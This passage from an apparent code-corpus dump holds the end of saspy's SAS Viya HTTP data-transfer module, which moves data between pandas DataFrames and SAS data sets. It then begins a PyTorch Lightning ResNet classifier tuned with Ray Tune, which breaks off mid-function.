Error was: \"+str(e)}\n\n code = \"filename _sp_updn '\"+remotefile+\"' recfm=F encoding=binary lrecl=4096;\"\n\n ll = self.submit(code, \"text\")\n logf = ll['LOG']\n\n # GET data\n conn = self.sascfg.HTTPConn; conn.connect()\n headers={\"Accept\":\"*/*\",\"Content-Type\":\"application/octet-stream\",\n \"Authorization\":\"Bearer \"+self.sascfg._token}\n conn.request('GET', self._uri_files+\"/_sp_updn/content\", headers=headers)\n req = conn.getresponse()\n status = req.status\n\n fd.write(req.read())\n fd.flush()\n fd.close()\n conn.close()\n\n ll = self.submit(\"filename _sp_updn;\", 'text')\n logf += ll['LOG']\n\n return {'Success' : True,\n 'LOG' : logf}\n\n def _getbytelenF(self, x):\n return len(x.encode(self.sascfg.encoding))\n\n def _getbytelenR(self, x):\n return len(x.encode(self.sascfg.encoding, errors='replace'))\n\n def dataframe2sasdata(self, df: '<Pandas Data Frame object>', table: str ='a',\n libref: str =\"\", keep_outer_quotes: bool=False,\n embedded_newlines: bool=True,\n LF: str = '\\x01', CR: str = '\\x02',\n colsep: str = '\\x03', colrep: str = ' ',\n datetimes: dict={}, outfmts: dict={}, labels: dict={},\n outdsopts: dict={}, encode_errors = None, char_lengths = None,\n **kwargs):\n '''\n This method imports a Pandas Data Frame to a SAS Data Set, returning the SASdata object for the new Data Set.\n df - Pandas Data Frame to import to a SAS Data Set\n table - the name of the SAS Data Set to create\n libref - the libref for the SAS Data Set being created. Defaults to WORK, or USER if assigned\n keep_outer_quotes - for character columns, have SAS keep any outer quotes instead of stripping them off.\n embedded_newlines - if any char columns have embedded CR or LF, set this to True to get them iported into the SAS data set\n LF - if embedded_newlines=True, the chacter to use for LF when transferring the data; defaults to '\\x01'\n CR - if embedded_newlines=True, the chacter to use for CR when transferring the data; defaults to '\\x02'\n colsep - the column seperator character used for streaming the delimmited data to SAS defaults to '\\x03'\n datetimes - dict with column names as keys and values of 'date' or 'time' to create SAS date or times instead of datetimes\n outfmts - dict with column names and SAS formats to assign to the new SAS data set\n labels - dict with column names and SAS Labels to assign to the new SAS data set\n outdsopts - a dictionary containing output data set options for the table being created\n encode_errors - 'fail' or 'replace' - default is to 'fail', other choice is to 'replace' invalid chars with the replacement char \\\n 'ignore' will not transcode n Python, so you get whatever happens with your data and SAS\n char_lengths - How to determine (and declare) lengths for CHAR variables in the output SAS data set\n '''\n input = \"\"\n xlate = \"\"\n card = \"\"\n format = \"\"\n length = \"\"\n label = \"\"\n dts = []\n ncols = len(df.columns)\n lf = \"'\"+'%02x' % ord(LF.encode(self.sascfg.encoding))+\"'x\"\n cr = \"'\"+'%02x' % ord(CR.encode(self.sascfg.encoding))+\"'x \"\n delim = \"'\"+'%02x' % ord(colsep.encode(self.sascfg.encoding))+\"'x \"\n\n dts_upper = {k.upper():v for k,v in datetimes.items()}\n dts_keys = dts_upper.keys()\n fmt_upper = {k.upper():v for k,v in outfmts.items()}\n fmt_keys = fmt_upper.keys()\n lab_upper = {k.upper():v for k,v in labels.items()}\n lab_keys = lab_upper.keys()\n\n if encode_errors is None:\n encode_errors = 'fail'\n\n bpc = self._sb.pyenc[0]\n if char_lengths and str(char_lengths).strip() in 
['1','2','3','4']:\n bpc = int(char_lengths)\n if char_lengths and str(char_lengths) == 'exact':\n CnotB = False\n else:\n CnotB = bpc == 1\n\n if type(char_lengths) is not dict or len(char_lengths) < ncols:\n charlens = self._sb.df_char_lengths(df, encode_errors, char_lengths)\n else:\n charlens = char_lengths\n\n if charlens is None:\n return -1\n\n chr_upper = {k.upper():v for k,v in charlens.items()}\n\n if type(df.index) != pd.RangeIndex:\n warnings.warn(\"Note that Indexes are not transferred over as columns. Only actual coulmns are transferred\")\n\n for name in df.columns:\n colname = str(name).replace(\"'\", \"''\")\n col_up = str(name).upper()\n input += \"'\"+colname+\"'n \"\n if col_up in lab_keys:\n label += \"label '\"+colname+\"'n =\"+lab_upper[col_up]+\";\\n\"\n if col_up in fmt_keys:\n format += \"'\"+colname+\"'n \"+fmt_upper[col_up]+\" \"\n\n if df.dtypes[name].kind in ('O','S','U','V'):\n try:\n length += \" '\"+colname+\"'n $\"+str(chr_upper[col_up])\n except KeyError as e:\n logger.error(\"Dictionary provided as char_lengths is missing column: \"+colname)\n raise e\n if keep_outer_quotes:\n input += \"~ \"\n dts.append('C')\n if embedded_newlines:\n xlate += \" '\"+colname+\"'n = translate('\"+colname+\"'n, '0A'x, \"+lf+\");\\n\"\n xlate += \" '\"+colname+\"'n = translate('\"+colname+\"'n, '0D'x, \"+cr+\");\\n\"\n else:\n if df.dtypes[name].kind in ('M'):\n length += \" '\"+colname+\"'n 8\"\n input += \":B8601DT26.6 \"\n if col_up not in dts_keys:\n if col_up not in fmt_keys:\n format += \"'\"+colname+\"'n E8601DT26.6 \"\n else:\n if dts_upper[col_up].lower() == 'date':\n if col_up not in fmt_keys:\n format += \"'\"+colname+\"'n E8601DA. \"\n xlate += \" '\"+colname+\"'n = datepart('\"+colname+\"'n);\\n\"\n else:\n if dts_upper[col_up].lower() == 'time':\n if col_up not in fmt_keys:\n format += \"'\"+colname+\"'n E8601TM. \"\n xlate += \" '\"+colname+\"'n = timepart('\"+colname+\"'n);\\n\"\n else:\n logger.warning(\"invalid value for datetimes for column \"+colname+\". 
Using default.\")\n if col_up not in fmt_keys:\n format += \"'\"+colname+\"'n E8601DT26.6 \"\n dts.append('D')\n else:\n length += \" '\"+colname+\"'n 8\"\n if df.dtypes[name] == 'bool':\n dts.append('B')\n else:\n dts.append('N')\n\n code = \"data \"\n if len(libref):\n code += libref+\".\"\n code += \"'\"+table.strip().replace(\"'\", \"''\")+\"'n\"\n\n if len(outdsopts):\n code += '('\n for key in outdsopts:\n code += key+'='+str(outdsopts[key]) + ' '\n code += \");\\n\"\n else:\n code += \";\\n\"\n\n if len(length):\n code += \"length \"+length+\";\\n\"\n if len(format):\n code += \"format \"+format+\";\\n\"\n code += label\n code += \"infile datalines delimiter=\"+delim+\" STOPOVER;\\ninput @;\\nif _infile_ = '' then delete;\\ninput \"+input+\";\\n\"+xlate+\";\\ndatalines4;\"\n self._asubmit(code, \"text\")\n\n blksz = int(kwargs.get('blocksize', 1000000))\n noencode = self._sb.sascei == 'utf-8' or encode_errors == 'ignore'\n row_num = 0\n code = \"\"\n for row in df.itertuples(index=False):\n row_num += 1\n card = \"\"\n for col in range(ncols):\n var = str(row[col])\n\n if dts[col] == 'N' and var == 'nan':\n var = '.'\n elif dts[col] == 'C':\n if var == 'nan' or len(var) == 0:\n var = ' '\n else:\n var = var.replace(colsep, colrep)\n elif dts[col] == 'B':\n var = str(int(row[col]))\n elif dts[col] == 'D':\n if var in ['nan', 'NaT', 'NaN']:\n var = '.'\n else:\n var = str(row[col].to_datetime64())[:26]\n\n card += var\n if col < (ncols-1):\n card += colsep\n\n if embedded_newlines:\n card = card.replace(LF, colrep).replace(CR, colrep)\n card = card.replace('\\n', LF).replace('\\r', CR)\n\n code += card+\"\\n\"\n\n if len(code) > blksz:\n if not noencode:\n if encode_errors == 'fail':\n if CnotB:\n try:\n chk = code.encode(self.sascfg.encoding)\n except Exception as e:\n self._asubmit(\";;;;\\n;;;;\", \"text\")\n ll = self.submit(\"run;\", 'text')\n logger.error(\"Transcoding error encountered. Data transfer stopped on or before row \"+str(row_num))\n logger.error(\"DataFrame contains characters that can't be transcoded into the SAS session encoding.\\n\"+str(e))\n return row_num\n else:\n code = code.encode(self.sascfg.encoding, errors='replace').decode(self.sascfg.encoding)\n\n self._asubmit(code, \"text\")\n code = \"\"\n\n if not noencode and len(code) > 0:\n if encode_errors == 'fail':\n if CnotB:\n try:\n code = code.encode(self.sascfg.encoding).decode(self.sascfg.encoding)\n except Exception as e:\n self._asubmit(\";;;;\\n;;;;\", \"text\")\n ll = self.submit(\"run;\", 'text')\n logger.error(\"Transcoding error encountered. 
Data transfer stopped on or before row \"+str(row_num))\n logger.error(\"DataFrame contains characters that can't be transcoded into the SAS session encoding.\\n\"+str(e))\n return row_num\n else:\n code = code.encode(self.sascfg.encoding, errors='replace').decode(self.sascfg.encoding)\n\n self._asubmit(code+\";;;;\\n;;;;\", \"text\")\n ll = self.submit(\"quit;\", 'text')\n return None\n\n def sasdata2dataframe(self, table: str, libref: str ='', dsopts: dict = None,\n rowsep: str = '\\x01', colsep: str = '\\x02',\n rowrep: str = ' ', colrep: str = ' ',\n **kwargs) -> '<Pandas Data Frame object>':\n '''\n This method exports the SAS Data Set to a Pandas Data Frame, returning the Data Frame object.\n table - the name of the SAS Data Set you want to export to a Pandas Data Frame\n libref - the libref for the SAS Data Set.\n dsopts - data set options for the input SAS Data Set\n rowsep - the row seperator character to use; defaults to '\\x01'\n colsep - the column seperator character to use; defaults to '\\x02'\n rowrep - the char to convert to for any embedded rowsep chars, defaults to ' '\n colrep - the char to convert to for any embedded colsep chars, defaults to ' '\n '''\n dsopts = dsopts if dsopts is not None else {}\n\n method = kwargs.pop('method', None)\n if method and method.lower() == 'csv':\n return self.sasdata2dataframeCSV(table, libref, dsopts, **kwargs)\n #elif method and method.lower() == 'disk':\n else:\n return self.sasdata2dataframeDISK(table, libref, dsopts, rowsep, colsep,\n rowrep, colrep, **kwargs)\n\n\n def sasdata2dataframeCSV(self, table: str, libref: str ='', dsopts: dict =None, opts: dict = None,\n **kwargs) -> '<Pandas Data Frame object>':\n '''\n This method exports the SAS Data Set to a Pandas Data Frame, returning the Data Frame object.\n table - the name of the SAS Data Set you want to export to a Pandas Data Frame\n libref - the libref for the SAS Data Set.\n dsopts - data set options for the input SAS Data Set\n opts - a dictionary containing any of the following Proc Export options(delimiter, putnames)\n tempfile - DEPRECATED\n tempkeep - DEPRECATED\n\n These two options are for advanced usage. They override how saspy imports data. 
For more info\n see https://sassoftware.github.io/saspy/advanced-topics.html#advanced-sd2df-and-df2sd-techniques\n\n dtype - this is the parameter to Pandas read_csv, overriding what saspy generates and uses\n my_fmts - bool: if True, overrides the formats saspy would use, using those on the data set or in dsopts=\n '''\n tmp = kwargs.pop('tempfile', None)\n tmp = kwargs.pop('tempkeep', None)\n\n dsopts = dsopts if dsopts is not None else {}\n opts = opts if opts is not None else {}\n\n if libref:\n tabname = libref+\".'\"+table.strip().replace(\"'\", \"''\")+\"'n \"\n else:\n tabname = \"'\"+table.strip().replace(\"'\", \"''\")+\"'n \"\n\n code = \"data work.sasdata2dataframe / view=work.sasdata2dataframe; set \"+tabname+self._sb._dsopts(dsopts)+\";run;\\n\"\n\n ll = self.submit(code, \"text\")\n\n ##GET Data Table Info\n #conn = self.sascfg.HTTPConn; conn.connect()\n #headers={\"Accept\":\"application/vnd.sas.compute.data.table+json\", \"Authorization\":\"Bearer \"+self.sascfg._token}\n #conn.request('GET', \"/compute/sessions/\"+self.pid+\"/data/work/sasdata2dataframe\", headers=headers)\n #req = conn.getresponse()\n #status = req.status\n #conn.close()\n\n #resp = req.read()\n #js = json.loads(resp.decode(self.sascfg.encoding))\n\n conn = self.sascfg.HTTPConn; conn.connect()\n headers={\"Accept\":\"application/vnd.sas.collection+json\", \"Authorization\":\"Bearer \"+self.sascfg._token}\n conn.request('GET', \"/compute/sessions/\"+self.pid+\"/data/work/sasdata2dataframe/columns?start=0&limit=9999999\", headers=headers)\n req = conn.getresponse()\n status = req.status\n resp = req.read()\n conn.close()\n\n js = json.loads(resp.decode(self.sascfg.encoding))\n\n varlist = []\n vartype = []\n nvars = js.get('count')\n lst = js.get('items')\n for i in range(len(lst)):\n varlist.append(lst[i].get('name'))\n vartype.append(lst[i].get('type'))\n\n dvarlist = list(varlist)\n for i in range(len(varlist)):\n varlist[i] = varlist[i].replace(\"'\", \"''\")\n\n topts = dict(dsopts)\n topts.pop('firstobs', None)\n topts.pop('obs', None)\n\n code = \"data work._n_u_l_l_;output;run;\\n\"\n code += \"data _null_; set work._n_u_l_l_ \"+tabname+self._sb._dsopts(topts)+\";put 'FMT_CATS=';\\n\"\n\n for i in range(nvars):\n code += \"_tom = vformatn('\"+varlist[i]+\"'n);put _tom;\\n\"\n code += \"stop;\\nrun;\\nproc delete data=work._n_u_l_l_;run;\"\n\n ll = self.submit(code, \"text\")\n\n l2 = ll['LOG'].rpartition(\"FMT_CATS=\")\n l2 = l2[2].partition(\"\\n\")\n varcat = l2[2].split(\"\\n\", nvars)\n del varcat[nvars]\n\n code = \"proc delete data=work.sasdata2dataframe(memtype=view);run;\\n\"\n code += \"data work.sasdata2dataframe / view=work.sasdata2dataframe; set \"+tabname+self._sb._dsopts(dsopts)+\";\\nformat \"\n\n idx_col = kwargs.pop('index_col', False)\n eng = kwargs.pop('engine', 'c')\n my_fmts = kwargs.pop('my_fmts', False)\n k_dts = kwargs.pop('dtype', None)\n if k_dts is None and my_fmts:\n logger.warning(\"my_fmts option only valid when dtype= is specified. Ignoring and using necessary formatting for data transfer.\")\n my_fmts = False\n\n if not my_fmts:\n for i in range(nvars):\n if vartype[i] == 'FLOAT':\n code += \"'\"+varlist[i]+\"'n \"\n if varcat[i] in self._sb.sas_date_fmts:\n code += 'E8601DA10. '\n else:\n if varcat[i] in self._sb.sas_time_fmts:\n code += 'E8601TM15.6 '\n else:\n if varcat[i] in self._sb.sas_datetime_fmts:\n code += 'E8601DT26.6 '\n else:\n code += 'best32. 
'\n code += \";run;\\n\"\n ll = self.submit(code, \"text\")\n\n if k_dts is None:\n dts = {}\n for i in range(nvars):\n if vartype[i] == 'FLOAT':\n if varcat[i] not in self._sb.sas_date_fmts + self._sb.sas_time_fmts + self._sb.sas_datetime_fmts:\n dts[dvarlist[i]] = 'float'\n else:\n dts[dvarlist[i]] = 'str'\n else:\n dts[dvarlist[i]] = 'str'\n else:\n dts = k_dts\n\n code = \"filename _tomodsx '\"+self._sb.workpath+\"_tomodsx' lrecl=\"+str(self.sascfg.lrecl)+\" recfm=v encoding='utf-8';\\n\"\n code += \"proc export data=work.sasdata2dataframe outfile=_tomodsx dbms=csv replace;\\n\"\n code += self._sb._expopts(opts)+\" run;\\n\"\n code += \"proc delete data=work.sasdata2dataframe(memtype=view);run;\\n\"\n\n ll = self.submit(code, 'text')\n logf = ll['LOG']\n\n code = \"filename _sp_updn '\"+self._sb.workpath+\"_tomodsx' recfm=F encoding=binary lrecl=4096;\"\n\n ll = self.submit(code, \"text\")\n logf += ll['LOG']\n\n # GET data\n conn = self.sascfg.HTTPConn; conn.connect()\n headers={\"Accept\":\"*/*\",\"Content-Type\":\"application/octet-stream\",\n \"Authorization\":\"Bearer \"+self.sascfg._token}\n conn.request('GET', self._uri_files+\"/_sp_updn/content\", headers=headers)\n req = conn.getresponse()\n status = req.status\n\n sockout = _read_sock(req=req)\n\n df = pd.read_csv(sockout, index_col=idx_col, encoding='utf8', engine=eng, dtype=dts, **kwargs)\n\n conn.close()\n\n if k_dts is None: # don't override these if user provided their own dtypes\n for i in range(nvars):\n if vartype[i] == 'FLOAT':\n if varcat[i] in self._sb.sas_date_fmts + self._sb.sas_time_fmts + self._sb.sas_datetime_fmts:\n df[dvarlist[i]] = pd.to_datetime(df[dvarlist[i]], errors='coerce')\n\n ll = self.submit(\"filename _sp_updn;\", 'text')\n logf += ll['LOG']\n\n return df\n\n def sasdata2dataframeDISK(self, table: str, libref: str ='', dsopts: dict = None,\n rowsep: str = '\\x01', colsep: str = '\\x02',\n rowrep: str = ' ', colrep: str = ' ', **kwargs) -> '<Pandas Data Frame object>':\n '''\n This method exports the SAS Data Set to a Pandas Data Frame, returning the Data Frame object.\n table - the name of the SAS Data Set you want to export to a Pandas Data Frame\n libref - the libref for the SAS Data Set.\n dsopts - data set options for the input SAS Data Set\n rowsep - the row seperator character to use; defaults to '\\x01'\n colsep - the column seperator character to use; defaults to '\\x02'\n rowrep - the char to convert to for any embedded rowsep chars, defaults to ' '\n colrep - the char to convert to for any embedded colsep chars, defaults to ' '\n tempfile - DEPRECATED\n tempkeep - DEPRECATED\n\n These two options are for advanced usage. They override how saspy imports data. 
For more info\n see https://sassoftware.github.io/saspy/advanced-topics.html#advanced-sd2df-and-df2sd-techniques\n\n dtype - this is the parameter to Pandas read_csv, overriding what saspy generates and uses\n my_fmts - bool: if True, overrides the formats saspy would use, using those on the data set or in dsopts=\n '''\n tmp = kwargs.pop('tempfile', None)\n tmp = kwargs.pop('tempkeep', None)\n\n dsopts = dsopts if dsopts is not None else {}\n\n if libref:\n tabname = libref+\".'\"+table.strip().replace(\"'\", \"''\")+\"'n \"\n else:\n tabname = \"'\"+table.strip().replace(\"'\", \"''\")+\"'n \"\n\n code = \"data work.sasdata2dataframe / view=work.sasdata2dataframe; set \"+tabname+self._sb._dsopts(dsopts)+\";run;\\n\"\n\n ll = self.submit(code, \"text\")\n\n ##GET Data Table Info\n #conn = self.sascfg.HTTPConn; conn.connect()\n #headers={\"Accept\":\"application/vnd.sas.compute.data.table+json\", \"Authorization\":\"Bearer \"+self.sascfg._token}\n #conn.request('GET', \"/compute/sessions/\"+self.pid+\"/data/work/sasdata2dataframe\", headers=headers)\n #req = conn.getresponse()\n #status = req.status\n #conn.close()\n\n #resp = req.read()\n #js = json.loads(resp.decode(self.sascfg.encoding))\n\n conn = self.sascfg.HTTPConn; conn.connect()\n headers={\"Accept\":\"application/vnd.sas.collection+json\", \"Authorization\":\"Bearer \"+self.sascfg._token}\n conn.request('GET', \"/compute/sessions/\"+self.pid+\"/data/work/sasdata2dataframe/columns?start=0&limit=9999999\", headers=headers)\n req = conn.getresponse()\n status = req.status\n resp = req.read()\n conn.close()\n\n js = json.loads(resp.decode(self.sascfg.encoding))\n\n varlist = []\n vartype = []\n nvars = js.get('count')\n lst = js.get('items')\n for i in range(len(lst)):\n varlist.append(lst[i].get('name'))\n vartype.append(lst[i].get('type'))\n\n dvarlist = list(varlist)\n for i in range(len(varlist)):\n varlist[i] = varlist[i].replace(\"'\", \"''\")\n\n topts = dict(dsopts)\n topts.pop('firstobs', None)\n topts.pop('obs', None)\n\n code = \"proc delete data=work.sasdata2dataframe(memtype=view);run;\"\n code += \"data work._n_u_l_l_;output;run;\\n\"\n code += \"data _null_; set work._n_u_l_l_ \"+tabname+self._sb._dsopts(topts)+\";put 'FMT_CATS=';\\n\"\n\n for i in range(nvars):\n code += \"_tom = vformatn('\"+varlist[i]+\"'n);put _tom;\\n\"\n code += \"stop;\\nrun;\\nproc delete data=work._n_u_l_l_;run;\"\n\n ll = self.submit(code, \"text\")\n\n l2 = ll['LOG'].rpartition(\"FMT_CATS=\")\n l2 = l2[2].partition(\"\\n\")\n varcat = l2[2].split(\"\\n\", nvars)\n del varcat[nvars]\n\n rdelim = \"'\"+'%02x' % ord(rowsep.encode(self.sascfg.encoding))+\"'x\"\n cdelim = \"'\"+'%02x' % ord(colsep.encode(self.sascfg.encoding))+\"'x \"\n\n idx_col = kwargs.pop('index_col', False)\n eng = kwargs.pop('engine', 'c')\n my_fmts = kwargs.pop('my_fmts', False)\n k_dts = kwargs.pop('dtype', None)\n if k_dts is None and my_fmts:\n logger.warning(\"my_fmts option only valid when dtype= is specified. 
Ignoring and using necessary formatting for data transfer.\")\n my_fmts = False\n\n code = \"filename _tomodsx '\"+self._sb.workpath+\"_tomodsx' recfm=v termstr=NL encoding='utf-8';\\n\"\n code += \"data _null_; set \"+tabname+self._sb._dsopts(dsopts)+\";\\n\"\n\n if not my_fmts:\n for i in range(nvars):\n if vartype[i] == 'FLOAT':\n code += \"format '\"+varlist[i]+\"'n \"\n if varcat[i] in self._sb.sas_date_fmts:\n code += 'E8601DA10.'\n else:\n if varcat[i] in self._sb.sas_time_fmts:\n code += 'E8601TM15.6'\n else:\n if varcat[i] in self._sb.sas_datetime_fmts:\n code += 'E8601DT26.6'\n else:\n code += 'best32.'\n code += '; '\n if i % 10 == 9:\n code +='\\n'\n\n miss = {}\n code += \"\\nfile _tomodsx lrecl=\"+str(self.sascfg.lrecl)+\" dlm=\"+cdelim+\" recfm=v termstr=NL encoding='utf-8';\\n\"\n for i in range(nvars):\n if vartype[i] != 'FLOAT':\n code += \"'\"+varlist[i]+\"'n = translate('\"\n code += varlist[i]+\"'n, '{}'x, '{}'x); \".format( \\\n '%02x%02x' % \\\n (ord(rowrep.encode(self.sascfg.encoding)), \\\n ord(colrep.encode(self.sascfg.encoding))),\n '%02x%02x' % \\\n (ord(rowsep.encode(self.sascfg.encoding)), \\\n ord(colsep.encode(self.sascfg.encoding))))\n miss[dvarlist[i]] = ' '\n else:\n code += \"if missing('\"+varlist[i]+\"'n) then '\"+varlist[i]+\"'n = .; \"\n miss[dvarlist[i]] = '.'\n if i % 10 == 9:\n code +='\\n'\n code += \"\\nput \"\n for i in range(nvars):\n code += \" '\"+varlist[i]+\"'n \"\n if i % 10 == 9:\n code +='\\n'\n code += rdelim+\";\\nrun;\"\n\n ll = self.submit(code, \"text\")\n\n if k_dts is None:\n dts = {}\n for i in range(nvars):\n if vartype[i] == 'FLOAT':\n if varcat[i] not in self._sb.sas_date_fmts + self._sb.sas_time_fmts + self._sb.sas_datetime_fmts:\n dts[dvarlist[i]] = 'float'\n else:\n dts[dvarlist[i]] = 'str'\n else:\n dts[dvarlist[i]] = 'str'\n else:\n dts = k_dts\n\n quoting = kwargs.pop('quoting', 3)\n\n code = \"filename _sp_updn '\"+self._sb.workpath+\"_tomodsx' recfm=F encoding=binary lrecl=4096;\"\n\n ll = self.submit(code, \"text\")\n logf = ll['LOG']\n\n # GET data\n conn = self.sascfg.HTTPConn; conn.connect()\n headers={\"Accept\":\"*/*\",\"Content-Type\":\"application/octet-stream\",\n \"Authorization\":\"Bearer \"+self.sascfg._token}\n conn.request('GET', self._uri_files+\"/_sp_updn/content\", headers=headers)\n req = conn.getresponse()\n status = req.status\n\n\n sockout = _read_sock(req=req, method='DISK', rsep=(colsep+rowsep+'\\n').encode(), rowsep=rowsep.encode())\n\n df = pd.read_csv(sockout, index_col=idx_col, engine=eng, header=None, names=dvarlist,\n sep=colsep, lineterminator=rowsep, dtype=dts, na_values=miss,\n encoding='utf-8', quoting=quoting, **kwargs)\n\n conn.close()\n\n if k_dts is None: # don't override these if user provided their own dtypes\n for i in range(nvars):\n if vartype[i] == 'FLOAT':\n if varcat[i] in self._sb.sas_date_fmts + self._sb.sas_time_fmts + self._sb.sas_datetime_fmts:\n df[dvarlist[i]] = pd.to_datetime(df[dvarlist[i]], errors='coerce')\n\n ll = self.submit(\"filename _sp_updn;\", 'text')\n logf += ll['LOG']\n\n return df\n\nclass _read_sock(io.StringIO):\n def __init__(self, **kwargs):\n self.req = kwargs.get('req')\n self.method = kwargs.get('method', 'CSV')\n self.rowsep = kwargs.get('rowsep', b'\\n')\n self.rsep = kwargs.get('rsep', self.rowsep)\n self.datar = b\"\"\n\n def read(self, size=4096):\n datl = 0\n size = max(size, 4096)\n notarow = True\n\n while datl < size or notarow:\n data = self.req.read(size)\n dl = len(data)\n\n if dl:\n datl += dl\n self.datar += data\n if notarow:\n 
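                    # A row is only complete once at least one full row-separator
                    # sequence (self.rsep) has appeared in the buffered bytes; until
                    # then keep reading so the caller (pandas) never sees a partial record.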
notarow = self.datar.count(self.rsep) <= 0\n else:\n if len(self.datar) <= 0:\n return ''\n else:\n break\n\n data = self.datar.rpartition(self.rsep)\n if self.method == 'DISK':\n datap = (data[0]+data[1]).replace(self.rsep, self.rowsep)\n else:\n datap = data[0]+data[1]\n self.datar = data[2]\n\n return datap.decode()\n\n"} {"ext": "py", "sha": "1a30bc6d2b8411848efd48e48f9dc4590ba994ae", "content": "import pandas as pd\nfrom pytorch_lightning.loggers import TensorBoardLogger\nfrom pytorch_lightning.utilities.cloud_io import load as pl_load\nimport argparse\nimport json\n\nimport pytorch_lightning as pl\nimport pandas as pd\nimport sklearn\nfrom ray import tune\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn\nimport os\nfrom ray.tune import CLIReporter\nfrom ray.tune.schedulers import ASHAScheduler, PopulationBasedTraining\nfrom ray.tune.integration.pytorch_lightning import TuneReportCallback\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torchvision.models as models\nfrom torch.optim import SGD, Adam\nfrom torchvision import transforms\nimport MLmodels as m\nfrom ray.tune.integration.pytorch_lightning import TuneReportCheckpointCallback\nfrom ray.tune.suggest.bayesopt import BayesOptSearch\n\n\nclass ResNetClassifier(pl.LightningModule):\n def __init__(self, config, num_classes, resnet_version,\n test_path=None,\n optimizer='adam',\n transfer=True):\n super().__init__()\n\n self.__dict__.update(locals())\n resnets = {\n 18: models.resnet18, 34: models.resnet34,\n 50: models.resnet50, 101: models.resnet101,\n 152: models.resnet152\n }\n optimizers = {'adam': Adam, 'sgd': SGD}\n self.optimizer = optimizers[optimizer]\n # hyperparameters\n self.lr = config['lr']\n self.batch_size = config['batch_size']\n # for importing different versions of the data\n self.datatype = config['datatype']\n\n if 'B' in self.datatype and '20' not in self.datatype:\n self.data_length = 40\n else:\n self.data_length = 20\n\n self.training_data = None\n self.validation_data = None\n\n # Using a pretrained ResNet backbone\n self.resnet_model = resnets[resnet_version](pretrained=transfer)\n # Replace old FC layer with Identity so we can train our own\n linear_size = list(self.resnet_model.children())[-1].in_features\n\n # replace final layer for fine tuning\n fcn = [\n nn.Dropout(config['dr']),\n nn.Linear(linear_size, linear_size),\n ]\n\n fcn2 = [\n nn.Linear(linear_size, num_classes)\n ]\n\n if num_classes > 1:\n fcn2.append(torch.nn.LogSoftmax(dim=1))\n\n self.fcn1 = nn.Sequential(*fcn)\n self.d1 = m.drelu(linear_size)\n self.fcn2 = nn.Sequential(*fcn2)\n self.resnet_model.conv1 = torch.nn.Conv1d(1, 64, (7, 7), (2, 2), (3, 3), bias=False)\n\n modules = list(self.resnet_model.children())[:-1] # delete the last fc layer.\n self.resnet_model = nn.Sequential(*modules)\n\n def forward(self, X):\n x = self.resnet_model(X)\n x = x.view(x.size(0), -1) # flatten\n x = self.fcn1(x)\n x = self.d1(x)\n x = self.fcn2(x)\n return x\n\n def configure_optimizers(self):\n return self.optimizer(self.parameters(), lr=self.lr)\n\n def prepare_data(self):\n # import our data\n train, validate, weights = m.get_rawdata(self.datatype, 10, 5, round=8)\n _train = train.copy()\n _validate = validate.copy()\n\n # Assigns labels for learning\n _train[\"binary\"] = _train[\"affinity\"].apply(m.bi_labelM)\n _validate[\"binary\"] = _validate[\"affinity\"].apply(m.bi_labelM)\n\n _weights = torch.FloatTensor(weights)\n # instantiate loss criterion, need weights so put this here\n self.criterion 
= m.SmoothCrossEntropyLoss(weight=_weights, smoothing=0.01)\n\n self.training_data = _train\n self.validation_data = _validate\n\n def train_dataloader(self):\n # Data Loading\n train_reader = m.NAReader(self.training_data, shuffle=True, max_length=self.data_length)\n\n train_loader = torch.utils.data.DataLoader(\n train_reader,\n batch_size=self.batch_size,\n collate_fn=m.my_collate,\n num_workers=4,\n # pin_memory=True,\n shuffle=True\n )\n\n return train_loader\n\n def training_step(self, batch, batch_idx):\n seq, x, y = batch\n softmax = self(x)\n train_loss = self.criterion(softmax, y)\n\n # Convert to labels\n preds = torch.argmax(softmax, 1).clone().double() # convert to torch float 64\n\n predcpu = list(preds.detach().cpu().numpy())\n ycpu = list(y.detach().cpu().numpy())\n train_acc = sklearn.metrics.balanced_accuracy_score(ycpu, predcpu)\n\n # perform logging\n self.log(\"ptl/train_loss\", train_loss, on_step=True, on_epoch=True, prog_bar=True, logger=True)\n self.log(\"ptl/train_accuracy\", train_acc, on_step=True, on_epoch=True, prog_bar=True, logger=True)\n return train_loss\n\n def val_dataloader(self):\n # Data Loading\n val_reader = m.NAReader(self.validation_data, shuffle=False)\n\n val_loader = torch.utils.data.DataLoader(\n val_reader,\n batch_size=self.batch_size,\n collate_fn=m.my_collate,\n num_workers=4,\n # pin_memory=True,\n shuffle=False\n )\n\n return val_loader\n\n def validation_step(self, batch, batch_idx):\n seq, x, y = batch\n softmax = self(x)\n val_loss = self.criterion(softmax, y)\n\n # Convert to labels\n preds = torch.argmax(softmax, 1).clone().double() # convert to torch float 64\n\n predcpu = list(preds.detach().cpu().numpy())\n ycpu = list(y.detach().cpu().numpy())\n val_acc = sklearn.metrics.balanced_accuracy_score(ycpu, predcpu)\n\n # perform logging\n self.log(\"ptl/val_loss\", val_loss, on_epoch=True, prog_bar=True, logger=True)\n self.log(\"ptl/val_accuracy\", val_acc, on_epoch=True, prog_bar=True, logger=True)\n return {\"val_loss\": val_loss, \"val_acc\": val_acc}\n\n\ndef train_resnet(config, checkpoint_dir=None, num_epochs=10, num_gpus=0):\n trainer = pl.Trainer(\n # default_root_dir=\"./checkpoints/\",\n max_epochs=num_epochs,\n gpus=num_gpus,\n logger=TensorBoardLogger(\n save_dir=tune.get_trial_dir(), name=\"\", version=\".\"),\n progress_bar_refresh_rate=0,\n callbacks=[\n TuneReportCheckpointCallback(\n metrics={\n \"loss\": \"ptl/val_loss\",\n \"acc\": \"ptl/val_accuracy\"\n },\n filename=\"checkpoint\",\n on=\"validation_end\")\n ]\n )\n\n if checkpoint_dir:\n # Currently, this leads to errors:\n # model = LightningMNISTClassifier.load_from_checkpoint(\n # os.path.join(checkpoint, \"checkpoint\"))\n # Workaround:\n ckpt = pl_load(\n os.path.join(checkpoint_dir, \"checkpoint\"),\n map_location=lambda storage, loc: storage)\n model = ResNetClassifier._load_model_state(\n ckpt, config=config)\n trainer.current_epoch = ckpt[\"epoch\"]\n else:\n model = ResNetClassifier(config, 2, 18, optimizer='adam')\n\n trainer.fit(model)\n\ndef tune_asha(datatype, num_samples=10, num_epochs=10, gpus_per_trial=0, cpus_per_trial=1):\n config = {\n \"lr\": tune.loguniform(1e-4, 1e-1),\n \"batch_size\": tune.choice([32, 64, 128]),\n \"dr\": tune.loguniform(0.005, 0.5),\n \"datatype\": datatype\n }\n\n scheduler = ASHAScheduler(\n 